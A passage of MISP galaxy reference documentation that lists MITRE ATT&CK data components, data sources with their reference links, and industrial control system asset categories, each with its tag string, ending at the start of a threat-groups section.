Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)

The tag is: misp-galaxy:mitre-data-component="WMI Creation"

Table 6773. Table References

Links

Instance Creation

Initial construction of a new instance (ex: instance.insert within GCP Audit Logs)

The tag is: misp-galaxy:mitre-data-component="Instance Creation"

Table 6774. Table References

Links

Image Creation

Initial construction of a virtual machine image (ex: Azure Compute Service Images PUT)

The tag is: misp-galaxy:mitre-data-component="Image Creation"

Table 6775. Table References

Links

Container Metadata

Contextual data about a container and activity around it such as name, ID, image, or status

The tag is: misp-galaxy:mitre-data-component="Container Metadata"

Table 6776. Table References

Links

Cluster Metadata

Contextual data about a cluster and activity around it such as name, namespace, age, or status

The tag is: misp-galaxy:mitre-data-component="Cluster Metadata"

Table 6777. Table References

Links

Malware Content

Code, strings, and other signatures that compromise a malicious payload

The tag is: misp-galaxy:mitre-data-component="Malware Content"

Table 6778. Table References

Links

Network Communication

Network requests made by an application or domains contacted

The tag is: misp-galaxy:mitre-data-component="Network Communication"

Table 6779. Table References

Links

Protected Configuration

Device configuration options that are not typically utilized by benign applications

The tag is: misp-galaxy:mitre-data-component="Protected Configuration"

Table 6780. Table References

Links

Process Creation

The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. Win EID 4688, Sysmon EID 1, cmd.exe > net use, etc.)

The tag is: misp-galaxy:mitre-data-component="Process Creation"

Table 6781. Table References

Links

Pod Creation

Initial construction of a new pod (ex: kubectl apply|run)

The tag is: misp-galaxy:mitre-data-component="Pod Creation"

Table 6782. Table References

Links

Certificate Registration

Queried or logged information highlighting current and expired digital certificates (ex: Certificate transparency)

The tag is: misp-galaxy:mitre-data-component="Certificate Registration"

Table 6783. Table References

Links

Response Content

Logged network traffic in response to a scan showing both protocol header and body values

The tag is: misp-galaxy:mitre-data-component="Response Content"

Table 6784. Table References

Links

Snapshot Creation

Initial construction of a new snapshot (ex: AWS create-snapshot)

The tag is: misp-galaxy:mitre-data-component="Snapshot Creation"

Table 6785. Table References

Links

Container Start

Activation or invocation of a container (ex: docker start or docker restart)

The tag is: misp-galaxy:mitre-data-component="Container Start"

Table 6786. Table References

Links

Service Creation

Initial construction of a new service/daemon (ex: Windows EID 4697 or /var/log daemon logs)

The tag is: misp-galaxy:mitre-data-component="Service Creation"

Table 6787. Table References

Links

Volume Creation

Initial construction of a cloud volume (ex: AWS create-volume)

The tag is: misp-galaxy:mitre-data-component="Volume Creation"

Table 6788. Table References

Links

Firewall Disable

Deactivation or stoppage of a cloud service (ex: Write/Delete entries within Azure Firewall Activity Logs)

The tag is: misp-galaxy:mitre-data-component="Firewall Disable"

Table 6789. Table References

Links

File Deletion

Removal of a file (ex: Sysmon EID 23, macOS ESF EID ES_EVENT_TYPE_AUTH_UNLINK, or Linux commands auditd unlink, rename, rmdir, unlinked, or renameat rules)

The tag is: misp-galaxy:mitre-data-component="File Deletion"

Table 6790. Table References

Links

Instance Deletion

Removal of an instance (ex: instance.delete within GCP Audit Logs)

The tag is: misp-galaxy:mitre-data-component="Instance Deletion"

Table 6791. Table References

Links

Image Deletion

Removal of a virtual machine image (ex: Azure Compute Service Images DELETE)

The tag is: misp-galaxy:mitre-data-component="Image Deletion"

Table 6792. Table References

Links

Driver Load

Attaching a driver to either user or kernel-mode of a system (ex: Sysmon EID 6)

The tag is: misp-galaxy:mitre-data-component="Driver Load"

Table 6793. Table References

Links

Driver Metadata

Contextual data about a driver and activity around it such as driver issues reporting or integrity (page hash, code) checking

The tag is: misp-galaxy:mitre-data-component="Driver Metadata"

Table 6794. Table References

Links

Drive Modification

Changes made to a drive letter or mount point of a data storage device

The tag is: misp-galaxy:mitre-data-component="Drive Modification"

Table 6795. Table References

Links

Passive DNS

Logged domain name system (DNS) data highlighting timelines of domain to IP address resolutions (ex: passive DNS)

The tag is: misp-galaxy:mitre-data-component="Passive DNS"

Table 6796. Table References

Links

Domain Registration

Information about domain name assignments and other domain metadata (ex: WHOIS)

The tag is: misp-galaxy:mitre-data-component="Domain Registration"

Table 6797. Table References

Links

Snapshot Deletion

Removal of a snapshot (ex: AWS delete-snapshot)

The tag is: misp-galaxy:mitre-data-component="Snapshot Deletion"

Table 6798. Table References

Links

Volume Deletion

Removal of a a cloud volume (ex: AWS delete-volume)

The tag is: misp-galaxy:mitre-data-component="Volume Deletion"

Table 6799. Table References

Links

Firewall Enumeration

An extracted list of available firewalls and/or their associated settings/rules (ex: Azure Network Firewall CLI Show commands)

The tag is: misp-galaxy:mitre-data-component="Firewall Enumeration"

Table 6800. Table References

Links

Group Enumeration

An extracted list of available groups and/or their associated settings (ex: AWS list-groups)

The tag is: misp-galaxy:mitre-data-component="Group Enumeration"

Table 6801. Table References

Links

Instance Enumeration

An extracted list of instances within a cloud environment (ex: instance.list within GCP Audit Logs)

The tag is: misp-galaxy:mitre-data-component="Instance Enumeration"

Table 6802. Table References

Links

Pod Enumeration

An extracted list of pods within a cluster (ex: kubectl get pods)

The tag is: misp-galaxy:mitre-data-component="Pod Enumeration"

Table 6803. Table References

Links

Snapshot Enumeration

An extracted list of snapshops within a cloud environment (ex: AWS describe-snapshots)

The tag is: misp-galaxy:mitre-data-component="Snapshot Enumeration"

Table 6804. Table References

Links

Script Execution

The execution of a text file that contains code via the interpreter (e.g. Powershell, WMI, Windows EID 4104, etc.)

The tag is: misp-galaxy:mitre-data-component="Script Execution"

Table 6805. Table References

Links

Volume Enumeration

An extracted list of available volumes within a cloud environment (ex: AWS describe-volumes)

The tag is: misp-galaxy:mitre-data-component="Volume Enumeration"

Table 6806. Table References

Links

Firewall Metadata

Contextual data about a firewall and activity around it such as name, policy, or status

The tag is: misp-galaxy:mitre-data-component="Firewall Metadata"

Table 6807. Table References

Links

File Metadata

Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.

The tag is: misp-galaxy:mitre-data-component="File Metadata"

Table 6808. Table References

Links

Firmware Modification

Changes made to firmware, including its settings and/or data, such as MBR (Master Boot Record) and VBR (Volume Boot Record)

The tag is: misp-galaxy:mitre-data-component="Firmware Modification"

Table 6809. Table References

Links

File Modification

Changes made to a file, or its access permissions and attributes, typically to alter the contents of the targeted file (ex: Windows EID 4670 or Sysmon EID 2)

The tag is: misp-galaxy:mitre-data-component="File Modification"

Table 6810. Table References

Links

Group Metadata

Contextual data about a group which describes group and activity around it, such as name, permissions, or user accounts within the group

The tag is: misp-galaxy:mitre-data-component="Group Metadata"

Table 6811. Table References

Links

Group Modification

Changes made to a group, such as membership, name, or permissions (ex: Windows EID 4728 or 4732, AWS IAM UpdateGroup)

The tag is: misp-galaxy:mitre-data-component="Group Modification"

Table 6812. Table References

Links

Host Status

Logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications)

The tag is: misp-galaxy:mitre-data-component="Host Status"

Table 6813. Table References

Links

Instance Metadata

Contextual data about an instance and activity around it such as name, type, or status

The tag is: misp-galaxy:mitre-data-component="Instance Metadata"

Table 6814. Table References

Links

Image Metadata

Contextual data about a virtual machine image such as name, resource group, state, or type

The tag is: misp-galaxy:mitre-data-component="Image Metadata"

Table 6815. Table References

Links

Instance Modification

Changes made to an instance, including its settings and/or control data (ex: instance.addResourcePolicies or instances.setMetadata within GCP Audit Logs)

The tag is: misp-galaxy:mitre-data-component="Instance Modification"

Table 6816. Table References

Links

Image Modification

Changes made to a virtual machine image, including setting and/or control data (ex: Azure Compute Service Images PATCH)

The tag is: misp-galaxy:mitre-data-component="Image Modification"

Table 6817. Table References

Links

Instance Start

Activation or invocation of an instance (ex: instance.start within GCP Audit Logs)

The tag is: misp-galaxy:mitre-data-component="Instance Start"

Table 6818. Table References

Links

Instance Stop

Deactivation or stoppage of an instance (ex: instance.stop within GCP Audit Logs)

The tag is: misp-galaxy:mitre-data-component="Instance Stop"

Table 6819. Table References

Links

Module Load

Attaching a module into the memory of a process/program, typically to access shared resources/features provided by the module (ex: Sysmon EID 7)

The tag is: misp-galaxy:mitre-data-component="Module Load"

Table 6820. Table References

Links

Malware Metadata

Contextual data about a malicious payload, such as compilation times, file hashes, as well as watermarks or other identifiable configuration information

The tag is: misp-galaxy:mitre-data-component="Malware Metadata"

Table 6821. Table References

Links

Process Metadata

Contextual data about a running process, which may include information such as environment variables, image name, user/owner, etc.

The tag is: misp-galaxy:mitre-data-component="Process Metadata"

Table 6822. Table References

Links

Pod Metadata

Contextual data about a pod and activity around it such as name, ID, namespace, or status

The tag is: misp-galaxy:mitre-data-component="Pod Metadata"

Table 6823. Table References

Links

Process Modification

Changes made to a process, or its contents, typically to write and/or execute code in the memory of the target process (ex: Sysmon EID 8)

The tag is: misp-galaxy:mitre-data-component="Process Modification"

Table 6824. Table References

Links

Pod Modification

Changes made to a pod, including its settings and/or control data (ex: kubectl set|patch|edit)

The tag is: misp-galaxy:mitre-data-component="Pod Modification"

Table 6825. Table References

Links

Response Metadata

Contextual data about an Internet-facing resource gathered from a scan, such as running services or ports

The tag is: misp-galaxy:mitre-data-component="Response Metadata"

Table 6826. Table References

Links

Snapshot Metadata

Contextual data about a snapshot, which may include information such as ID, type, and status

The tag is: misp-galaxy:mitre-data-component="Snapshot Metadata"

Table 6827. Table References

Links

Service Metadata

Contextual data about a service/daemon, which may include information such as name, service executable, start type, etc.

The tag is: misp-galaxy:mitre-data-component="Service Metadata"

Table 6828. Table References

Links

Social Media

Established, compromised, or otherwise acquired social media personas

The tag is: misp-galaxy:mitre-data-component="Social Media"

Table 6829. Table References

Links

Snapshot Modification

Changes made to a snapshop, such as metadata and control data (ex: AWS modify-snapshot-attribute)

The tag is: misp-galaxy:mitre-data-component="Snapshot Modification"

Table 6830. Table References

Links

Service Modification

Changes made to a service/daemon, such as changes to name, description, and/or start type (ex: Windows EID 7040 or /var/log daemon logs)

The tag is: misp-galaxy:mitre-data-component="Service Modification"

Table 6831. Table References

Links

Volume Metadata

Contextual data about a cloud volume and activity around it, such as id, type, state, and size

The tag is: misp-galaxy:mitre-data-component="Volume Metadata"

Table 6832. Table References

Links

Volume Modification

Changes made to a cloud volume, including its settings and control data (ex: AWS modify-volume)

The tag is: misp-galaxy:mitre-data-component="Volume Modification"

Table 6833. Table References

Links

System Notifications

Notifications generated by the OS

The tag is: misp-galaxy:mitre-data-component="System Notifications"

Table 6834. Table References

Links

Permissions Requests

Permissions declared in an application’s manifest or property list file

The tag is: misp-galaxy:mitre-data-component="Permissions Requests"

Table 6835. Table References

Links

Permissions Request

System prompts triggered when an application requests new or additional permissions

The tag is: misp-galaxy:mitre-data-component="Permissions Request"

Table 6836. Table References

Links

Process Termination

Exit of a running process (ex: Sysmon EID 5 or Windows EID 4689)

The tag is: misp-galaxy:mitre-data-component="Process Termination"

Table 6837. Table References

Links

System Settings

Settings visible to the user on the device

The tag is: misp-galaxy:mitre-data-component="System Settings"

Table 6838. Table References

Links

mitre-data-source

Data sources represent the various subjects/topics of information that can be collected by sensors/logs. .

mitre-data-source is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MITRE

Cloud Storage - DS0010

Data object storage infrastructure hosted on-premise or by third-party providers, made available to users through network connections and/or APIs(Citation: Amazon S3)(Citation: Azure Blob Storage)(Citation: Google Cloud Storage)

The tag is: misp-galaxy:mitre-data-source="Cloud Storage - DS0010"

Table 6839. Table References

Links

https://attack.mitre.org/datasources/DS0010

https://aws.amazon.com/s3/

https://azure.microsoft.com/en-us/services/storage/blobs/

https://cloud.google.com/storage

User Account - DS0002

A profile representing a user, device, service, or application used to authenticate and access resources

The tag is: misp-galaxy:mitre-data-source="User Account - DS0002"

Table 6840. Table References

Links

https://attack.mitre.org/datasources/DS0002

Scheduled Job - DS0003

Automated tasks that can be executed at a specific time or on a recurring schedule running in the background (ex: Cron daemon, task scheduler, BITS)(Citation: Microsoft Tasks)

The tag is: misp-galaxy:mitre-data-source="Scheduled Job - DS0003"

Table 6841. Table References

Links

https://attack.mitre.org/datasources/DS0003

https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks

Malware Repository - DS0004

Information obtained (via shared or submitted samples) regarding malicious software (droppers, backdoors, etc.) used by adversaries

The tag is: misp-galaxy:mitre-data-source="Malware Repository - DS0004"

Table 6842. Table References

Links

https://attack.mitre.org/datasources/DS0004

Web Credential - DS0006

Credential material, such as session cookies or tokens, used to authenticate to web applications and services(Citation: Medium Authentication Tokens)(Citation: Auth0 Access Tokens)

The tag is: misp-galaxy:mitre-data-source="Web Credential - DS0006"

Table 6843. Table References

Links

https://attack.mitre.org/datasources/DS0006

https://auth0.com/docs/tokens/access-tokens

https://medium.com/@sherryhsu/session-vs-token-based-authentication-11a6c5ac45e4

Sensor Health - DS0013

Information from host telemetry providing insights about system status, errors, or other notable functional activity

The tag is: misp-galaxy:mitre-data-source="Sensor Health - DS0013"

Table 6844. Table References

Links

https://attack.mitre.org/datasources/DS0013

Application Vetting - DS0041

Application vetting report generated by an external cloud service.

The tag is: misp-galaxy:mitre-data-source="Application Vetting - DS0041"

Table 6845. Table References

Links

https://attack.mitre.org/datasources/DS0041

Application Log - DS0015

Events collected by third-party services such as mail servers, web applications, or other appliances (not by the native OS or platform)(Citation: Confluence Logs)

The tag is: misp-galaxy:mitre-data-source="Application Log - DS0015"

Table 6846. Table References

Links

https://attack.mitre.org/datasources/DS0015

https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html

Named Pipe - DS0023

Mechanisms that allow inter-process communication locally or over the network. A named pipe is usually found as a file and processes attach to it(Citation: Microsoft Named Pipes)

The tag is: misp-galaxy:mitre-data-source="Named Pipe - DS0023"

Table 6847. Table References

Links

https://attack.mitre.org/datasources/DS0023

https://docs.microsoft.com/en-us/windows/win32/ipc/named-pipes

User Interface - DS0042

Visual activity on the device that could alert the user to potentially malicious behavior.

The tag is: misp-galaxy:mitre-data-source="User Interface - DS0042"

Table 6848. Table References

Links

https://attack.mitre.org/datasources/DS0042

Windows Registry - DS0024

A Windows OS hierarchical database that stores much of the information and settings for software programs, hardware devices, user preferences, and operating-system configurations(Citation: Microsoft Registry)

The tag is: misp-galaxy:mitre-data-source="Windows Registry - DS0024"

Table 6849. Table References

Links

https://attack.mitre.org/datasources/DS0024

https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry

Cloud Service - DS0025

Infrastructure, platforms, or software that are hosted on-premise or by third-party providers, made available to users through network connections and/or APIs(Citation: Amazon AWS)(Citation: Azure Products)

The tag is: misp-galaxy:mitre-data-source="Cloud Service - DS0025"

Table 6850. Table References

Links

https://attack.mitre.org/datasources/DS0025

https://aws.amazon.com

https://azure.microsoft.com/en-us/services/

Active Directory - DS0026

A database and set of services that allows administrators to manage permissions, access to network resources, and stored data objects (user, group, application, or devices)(Citation: Microsoft AD DS Getting Started)

The tag is: misp-galaxy:mitre-data-source="Active Directory - DS0026"

Table 6851. Table References

Links

https://attack.mitre.org/datasources/DS0026

https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started

Logon Session - DS0028

Logon occurring on a system or resource (local, domain, or cloud) to which a user/device is gaining access after successful authentication and authorization(Citation: Microsoft Audit Logon Events)

The tag is: misp-galaxy:mitre-data-source="Logon Session - DS0028"

Table 6852. Table References

Links

https://attack.mitre.org/datasources/DS0028

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events

Network Traffic - DS0029

Data transmitted across a network (ex: Web, DNS, Mail, File, etc.), that is either summarized (ex: Netflow) and/or captured as raw data in an analyzable format (ex: PCAP)

The tag is: misp-galaxy:mitre-data-source="Network Traffic - DS0029"

Table 6853. Table References

Links

https://attack.mitre.org/datasources/DS0029

Network Share - DS0033

A storage resource (typically a folder or drive) made available from one host to others using network protocols, such as Server Message Block (SMB) or Network File System (NFS)(Citation: Microsoft NFS Overview)

The tag is: misp-galaxy:mitre-data-source="Network Share - DS0033"

Table 6854. Table References

Links

https://attack.mitre.org/datasources/DS0033

https://docs.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview

Internet Scan - DS0035

Information obtained (commonly via active network traffic probes or web crawling) regarding various types of resources and servers connected to the public Internet

The tag is: misp-galaxy:mitre-data-source="Internet Scan - DS0035"

Table 6855. Table References

Links

https://attack.mitre.org/datasources/DS0035

Domain Name - DS0038

Information obtained (commonly through registration or activity logs) regarding one or more IP addresses registered with human readable names (ex: mitre.org)

The tag is: misp-galaxy:mitre-data-source="Domain Name - DS0038"

Table 6856. Table References

Links

https://attack.mitre.org/datasources/DS0038

Firmware - DS0001

Computer software that provides low-level control for the hardware and device(s) of a host, such as BIOS or UEFI/EFI

The tag is: misp-galaxy:mitre-data-source="Firmware - DS0001"

Table 6857. Table References

Links

https://attack.mitre.org/datasources/DS0001

Snapshot - DS0020

A point-in-time copy of cloud volumes (files, settings, etc.) that can be created and/or deployed in cloud environments(Citation: Microsoft Snapshot)(Citation: Amazon Snapshots)

The tag is: misp-galaxy:mitre-data-source="Snapshot - DS0020"

Table 6858. Table References

Links

https://attack.mitre.org/datasources/DS0020

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSSnapshots.html

https://docs.microsoft.com/en-us/azure/virtual-machines/linux/snapshot-copy-managed-disk

Instance - DS0030

A virtual server environment which runs workloads, hosted on-premise or by third-party cloud providers(Citation: Amazon VM)(Citation: Google VM)

The tag is: misp-galaxy:mitre-data-source="Instance - DS0030"

Table 6859. Table References

Links

https://attack.mitre.org/datasources/DS0030

https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/

https://cloud.google.com/compute/docs/instances

WMI - DS0005

The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers(Citation: Microsoft WMI System Classes)(Citation: Microsoft WMI Architecture)

The tag is: misp-galaxy:mitre-data-source="WMI - DS0005"

Table 6860. Table References

Links

https://attack.mitre.org/datasources/DS0005

https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-architecture

https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-system-classes

Image - DS0007

A single file used to deploy a virtual machine/bootable disk into an on-premise or third-party cloud environment(Citation: Microsoft Image)(Citation: Amazon AMI)

The tag is: misp-galaxy:mitre-data-source="Image - DS0007"

Table 6861. Table References

Links

https://attack.mitre.org/datasources/DS0007

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIs.html

https://docs.microsoft.com/en-us/azure/virtual-machines/windows/capture-image-resource

Kernel - DS0008

A computer program, at the core of a computer OS, that resides in memory and facilitates interactions between hardware and software components(Citation: STIG Audit Kernel Modules)(Citation: Init Man Page)

The tag is: misp-galaxy:mitre-data-source="Kernel - DS0008"

Table 6862. Table References

Links

https://attack.mitre.org/datasources/DS0008

https://man7.org/linux/man-pages/man2/init_module.2.html

https://www.stigviewer.com/stig/oracle_linux_5/2016-12-20/finding/V-22383

Process - DS0009

Instances of computer programs that are being executed by at least one thread. Processes have memory space for process executables, loaded modules (DLLs or shared libraries), and allocated memory regions containing everything from user input to application-specific data structures(Citation: Microsoft Processes and Threads)

The tag is: misp-galaxy:mitre-data-source="Process - DS0009"

Table 6863. Table References

Links

https://attack.mitre.org/datasources/DS0009

https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads

Module - DS0011

Executable files consisting of one or more shared classes and interfaces, such as portable executable (PE) format binaries/dynamic link libraries (DLL), executable and linkable format (ELF) binaries/shared libraries, and Mach-O format binaries/shared libraries(Citation: Microsoft LoadLibrary)(Citation: Microsoft Module Class)

The tag is: misp-galaxy:mitre-data-source="Module - DS0011"

Table 6864. Table References

Links

https://attack.mitre.org/datasources/DS0011

https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module

https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya

Persona - DS0021

A malicious online profile representing a user commonly used by adversaries to social engineer or otherwise target victims

The tag is: misp-galaxy:mitre-data-source="Persona - DS0021"

Table 6865. Table References

Links

https://attack.mitre.org/datasources/DS0021

Script - DS0012

A file or stream containing a list of commands, allowing them to be launched in sequence(Citation: Microsoft PowerShell Logging)(Citation: FireEye PowerShell Logging)(Citation: Microsoft AMSI)

The tag is: misp-galaxy:mitre-data-source="Script - DS0012"

Table 6866. Table References

Links

https://attack.mitre.org/datasources/DS0012

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7

https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal

https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html

Cluster - DS0031

A set of containerized computing resources that are managed together but have separate nodes to execute various tasks and/or applications(Citation: Kube Cluster Admin)(Citation: Kube Cluster Info)

The tag is: misp-galaxy:mitre-data-source="Cluster - DS0031"

Table 6867. Table References

Links

https://attack.mitre.org/datasources/DS0031

https://kubernetes.io/docs/concepts/cluster-administration/

https://kubernetes.io/docs/reference/generated/kubectl/kubectl-commands#cluster-info

Pod - DS0014

A single unit of shared resources within a cluster, comprised of one or more containers(Citation: Kube Kubectl)(Citation: Kube Pod)

The tag is: misp-galaxy:mitre-data-source="Pod - DS0014"

Table 6868. Table References

Links

https://attack.mitre.org/datasources/DS0014

https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.19/#pod-v1-core

https://kubernetes.io/docs/reference/kubectl/kubectl/

Drive - DS0016

A non-volatile data storage device (hard drive, floppy disk, USB flash drive) with at least one formatted partition, typically mounted to the file system and/or assigned a drive letter(Citation: Sysmon EID 9)

The tag is: misp-galaxy:mitre-data-source="Drive - DS0016"

Table 6869. Table References

Links

https://attack.mitre.org/datasources/DS0016

https://docs.microsoft.com/sysinternals/downloads/sysmon#event-id-9-rawaccessread

Command - DS0017

A directive given to a computer program, acting as an interpreter of some kind, in order to perform a specific task(Citation: Confluence Linux Command Line)(Citation: Audit OSX)

The tag is: misp-galaxy:mitre-data-source="Command - DS0017"

Table 6870. Table References

Links

https://attack.mitre.org/datasources/DS0017

https://confluence.atlassian.com/confkb/how-to-enable-command-line-audit-logging-in-linux-956166545.html

https://www.scip.ch/en/?labs.20150108

Firewall - DS0018

A network security system, running locally on an endpoint or remotely as a service (ex: cloud environment), that monitors and controls incoming/outgoing network traffic based on predefined rules(Citation: AWS Sec Groups VPC)

The tag is: misp-galaxy:mitre-data-source="Firewall - DS0018"

Table 6871. Table References

Links

https://attack.mitre.org/datasources/DS0018

https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html

Service - DS0019

A computer process that is configured to execute continuously in the background and perform system tasks, in some cases before any user has logged in(Citation: Microsoft Services)(Citation: Linux Services Run Levels)

The tag is: misp-galaxy:mitre-data-source="Service - DS0019"

Table 6872. Table References

Links

https://attack.mitre.org/datasources/DS0019

https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications

https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/

File - DS0022

A computer resource object, managed by the I/O system, for storing data (such as images, text, videos, computer programs, or any wide variety of other media).(Citation: Microsoft File Mgmt)

The tag is: misp-galaxy:mitre-data-source="File - DS0022"

Table 6873. Table References

Links

https://attack.mitre.org/datasources/DS0022

https://docs.microsoft.com/en-us/windows/win32/fileio/file-management

Container - DS0032

A standard unit of virtualized software that packages up code and all its dependencies so the application runs quickly and reliably from one computing environment to another(Citation: Docker Docs Container)

The tag is: misp-galaxy:mitre-data-source="Container - DS0032"

Table 6874. Table References

Links

https://attack.mitre.org/datasources/DS0032

https://docs.docker.com/engine/api/v1.41/#tag/Container

Driver - DS0027

A computer program that operates or controls a particular type of device that is attached to a computer. Provides a software interface to hardware devices, enabling operating systems and other computer programs to access hardware functions without needing to know precise details about the hardware being used(Citation: IOKit Fundamentals)(Citation: Windows Getting Started Drivers)

The tag is: misp-galaxy:mitre-data-source="Driver - DS0027"

Table 6875. Table References

Links

https://attack.mitre.org/datasources/DS0027

https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html

https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode

Volume - DS0034

Block object storage hosted on-premise or by third-party providers, typically made available to resources as virtualized hard drives(Citation: Amazon S3)(Citation: Azure Blob Storage)(Citation: Google Cloud Storage)

The tag is: misp-galaxy:mitre-data-source="Volume - DS0034"

Table 6876. Table References

Links

https://attack.mitre.org/datasources/DS0034

https://aws.amazon.com/s3/

https://azure.microsoft.com/en-us/services/storage/blobs/

https://cloud.google.com/storage

Group - DS0036

A collection of multiple user accounts that share the same access rights to the computer and/or network resources and have common security rights(Citation: Amazon IAM Groups)

The tag is: misp-galaxy:mitre-data-source="Group - DS0036"

Table 6877. Table References

Links

https://attack.mitre.org/datasources/DS0036

https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html

Certificate - DS0037

A digital document, which highlights information such as the owner’s identity, used to instill trust in public keys used while encrypting network communications

The tag is: misp-galaxy:mitre-data-source="Certificate - DS0037"

Table 6878. Table References

Links

https://attack.mitre.org/datasources/DS0037

Assets

A list of asset categories that are commonly found in industrial control systems..

Assets is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MITRE

Control Server

A device which acts as both a server and controller, that hosts the control software used in communicating with lower-level control devices in an ICS network (e.g. Remote Terminal Units (RTUs) and Programmable Logic Controllers (PLCs)).

The tag is: misp-galaxy:mitre-ics-assets="Control Server"

Table 6879. Table References

Links

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Data Historian

A centralized database located on a computer installed in the control system DMZ supporting external corporate user data access for archival and analysis using statistical process control and other techniques.

The tag is: misp-galaxy:mitre-ics-assets="Data Historian"

Table 6880. Table References

Links

https://ics-cert.us-cert.gov/Secure-Architecture-Design-Definitions

Engineering Workstation

The engineering workstation is usually a high-end very reliable computing platform designed for configuration, maintenance and diagnostics of the control system applications and other control system equipment. The system is usually made up of redundant hard disk drives, high speed network interface, reliable CPUs, performance graphics hardware, and applications that provide configuration and monitoring tools to perform control system application development, compilation and distribution of system modifications.

The tag is: misp-galaxy:mitre-ics-assets="Engineering Workstation"

Table 6881. Table References

Links

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Field Controller/RTU/PLC/IED

Controller terminology depends on the type of system they are associated with. They provide typical processing capabilities. Controllers, sometimes referred to as Remote Terminal Units (RTU) and Programmable Logic Controllers (PLC), are computerized control units that are typically rack or panel mounted with modular processing and interface cards. The units are collocated with the process equipment and interface through input and output modules to the various sensors and controlled devices. Most utilize a programmable logic-based application that provides scanning and writing of data to and from the IO interface modules and communicates with the control system network via various communications methods, including serial and network communications

The tag is: misp-galaxy:mitre-ics-assets="Field Controller/RTU/PLC/IED"

Table 6882. Table References

Links

https://ics-cert.us-cert.gov/Secure-Architecture-Design-Definitions

http://isa99.isa.org/ISA99%20Wiki/WP-2-1.aspx

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Human-Machine Interface

In computer science and human-computer interaction, the Human-Machine Interface (HMI) refers to the graphical, textual and auditory information the program presents to the user (operator) using computer monitors and audio subsystems, and the control sequences (such as keystrokes with the computer keyboard, movements of the computer mouse, and selections with the touchscreen) the user employs to control the program. Currently the following types of HMI are the most common: Graphical user interfaces(GUI) accept input via devices such as computer keyboard and mouse and provide articulated graphical output on the computer monitor. Web-based user interfaces accept input and provide output by generating web pages which are transported via the network and viewed by the user using a web browser program. The operations user must be able to control the system and assess the state of the system. Each control system vendor provides a unique look-and-feel to their basic HMI applications. An older, not gender-neutral version of the term is man-machine interface (MMI). The system may expose several user interfaces to serve different kinds of users. User interface screens may be optimized to provide the appropriate information and control interface to operations users, engineering users and management users.

The tag is: misp-galaxy:mitre-ics-assets="Human-Machine Interface"

Table 6883. Table References

Links

https://ics-cert.us-cert.gov/Secure-Architecture-Design-Definitions

http://isa99.isa.org/ISA99%20Wiki/WP-2-1.aspx

Input/Output Server

The Input/Output (I/O) server provides the interface between the control system LAN applications and the field equipment monitored and controlled by the control system applications. The I/O server, sometimes referred to as a Front-End Processor (FEP) or Data Acquisition Server (DAS), converts the control system application data into packets that are transmitted over various types of communications media to the end device locations. The I/O server also converts data received from the various end devices over different communications mediums into data formatted to communicate with the control system networked applications.

The tag is: misp-galaxy:mitre-ics-assets="Input/Output Server"

Table 6884. Table References

Links

https://ics-cert.us-cert.gov/Secure-Architecture-Design-Definitions

Safety Instrumented System/Protection Relay

A safety instrumented system (SIS) takes automated action to keep a plant in a safe state, or to put it into a safe state, when abnormal conditions are present. The SIS may implement a single function or multiple functions to protect against various process hazards in your plant. The function of protective relaying is to cause the prompt removal from service of an element of a power system when it suffers a short circuit or when it starts to operate in any abnormal manner that might cause damage or otherwise interfere with the effective operation of the rest of the system.

The tag is: misp-galaxy:mitre-ics-assets="Safety Instrumented System/Protection Relay"

Table 6885. Table References

Links

http://sache.org/beacon/files/2009/07/en/read/2009-07-Beacon-s.pdf

http://www.gegridsolutions.com/multilin/notes/artsci/artsci.pdf

Groups

Groups are sets of related intrusion activity that are tracked by a common name in the security community. Groups are also sometimes referred to as campaigns or intrusion sets. Some groups have multiple names associated with the same set of activities due to various organizations tracking the same set of activities by different names. Groups are mapped to publicly reported technique use and referenced in the ATT&CK for ICS knowledge base. Groups are also mapped to reported software used during intrusions..

Groups is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MITRE

ALLANITE

